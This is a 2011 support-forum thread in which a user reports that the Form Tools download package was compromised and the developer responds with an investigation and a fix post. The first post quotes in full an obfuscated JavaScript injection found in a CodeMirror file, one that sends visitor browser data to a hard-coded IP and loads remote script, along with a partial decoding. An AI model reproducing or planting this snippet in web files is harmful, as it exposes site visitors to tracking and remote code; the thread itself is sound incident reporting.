The following warnings occurred:
Warning [2] Undefined array key "avatartype" - Line: 783 - File: global.php PHP 8.1.31 (Linux)
File Line Function
/global.php 783 errorHandler->error
/printthread.php 16 require_once
Warning [2] Undefined array key "avatartype" - Line: 783 - File: global.php PHP 8.1.31 (Linux)
File Line Function
/global.php 783 errorHandler->error
/printthread.php 16 require_once
Warning [2] Undefined variable $newpmmsg - Line: 40 - File: global.php(841) : eval()'d code PHP 8.1.31 (Linux)
File Line Function
/global.php(841) : eval()'d code 40 errorHandler->error
/global.php 841 eval
/printthread.php 16 require_once
Warning [2] Undefined array key "style" - Line: 909 - File: global.php PHP 8.1.31 (Linux)
File Line Function
/global.php 909 errorHandler->error
/printthread.php 16 require_once
Warning [2] Undefined property: MyLanguage::$lang_select_default - Line: 5024 - File: inc/functions.php PHP 8.1.31 (Linux)
File Line Function
/inc/functions.php 5024 errorHandler->error
/global.php 909 build_theme_select
/printthread.php 16 require_once
Warning [2] Undefined array key "additionalgroups" - Line: 7162 - File: inc/functions.php PHP 8.1.31 (Linux)
File Line Function
/inc/functions.php 7162 errorHandler->error
/inc/functions.php 5044 is_member
/global.php 909 build_theme_select
/printthread.php 16 require_once
Warning [2] Undefined array key 1 - Line: 1415 - File: inc/functions.php PHP 8.1.31 (Linux)
File Line Function
/inc/functions.php 1415 errorHandler->error
/inc/functions.php 1370 fetch_forum_permissions
/printthread.php 76 forum_permissions
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error
Warning [2] Undefined array key "showimages" - Line: 160 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 160 errorHandler->error
Warning [2] Undefined array key "showvideos" - Line: 165 - File: printthread.php PHP 8.1.31 (Linux)
File Line Function
/printthread.php 165 errorHandler->error



Form Tools
Download of latest version infected - Printable Version

+- Form Tools (https://forums.formtools.org)
+-- Forum: Form Tools (https://forums.formtools.org/forumdisplay.php?fid=1)
+--- Forum: Installation (https://forums.formtools.org/forumdisplay.php?fid=4)
+--- Thread: Download of latest version infected (/showthread.php?tid=1805)



Download of latest version infected - __diz__ - Dec 9th, 2011

Hi Ben

Please check the latest download of formtools. It is infected with a encoded javascript. I guess it has happened through Wordpress during the last two days. The version from 6.12. I downloaded also was not infected.

You can check witthin the archive e.g.
formtools\global\codemirror\js\tokenizejavascript.js

In this (and others) you will find:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

The script will be decoded and try to connect a russian server.

I have decoded it to:

["sc_co","getElementById","colorDepth","width","height","charset","location","referrer","userAgent","script","createElement","id","src","http://91.196.216.64/s.php?ref=","&cls=","&sw=","&sh=","&dc=","&lc=","&ua=","head","getElementsByTagName","appendChild"]

I don't know exactly what the script does. It is evident that it is trying to contact http://91.196.216.64, perhaps to reload code. This does also happen on your site.

Usefule information can be found at: http://dan.cx/blog/2011/11/pulling-apart-wordpress-hack

Please check!!

Regards Dirk






RE: Download of latest version infected - Ben - Dec 9th, 2011

Hi Diz,

Thank you SO much for reporting this. I took everything offline this morning and I'm still investigating.

That link you posted does help a little, but the actual source of the hack is different. It's definitely a Wordpress-related flaw, but I haven't been able to identify where it originally stems from on my site: the PHP code they mention isn't anywhere to be found.

I'll post more when I know something more concrete.

- Ben


RE: Download of latest version infected - Ben - Dec 9th, 2011

Hi Dirk,

I've made a post outlining the problem, why it happened, who's affected and how to fix:
http://www.formtools.org/wordpress/?p=599

I'm going to be spending the next few days examining every last nook and cranny of the site (as well as replacing my Wordpress installation with a totally new one) to prevent this from happening again.

- Ben


RE: Download of latest version infected - __diz__ - Dec 10th, 2011

Hi Ben

I'am glad that I could help. Formtools is a very stable and innovative tool. Such a hack can happen to everybody handling php on his site and has nothing to do with Formtools itself as a script. As I can see, you have investigated in detail and take very quick actions to inform the users. That's not self-evident for every developer. All webmasters who uses active scripts must always have an eye on security, so don't worry too much about the inconvenience you might have caused. Thanks for your information and actions.

Kind Regards
Dirk

(Dec 9th, 2011, 2:07 PM)Ben Wrote: Hi Dirk,

I've made a post outlining the problem, why it happened, who's affected and how to fix:
http://www.formtools.org/wordpress/?p=599

I'm going to be spending the next few days examining every last nook and cranny of the site (as well as replacing my Wordpress installation with a totally new one) to prevent this from happening again.

- Ben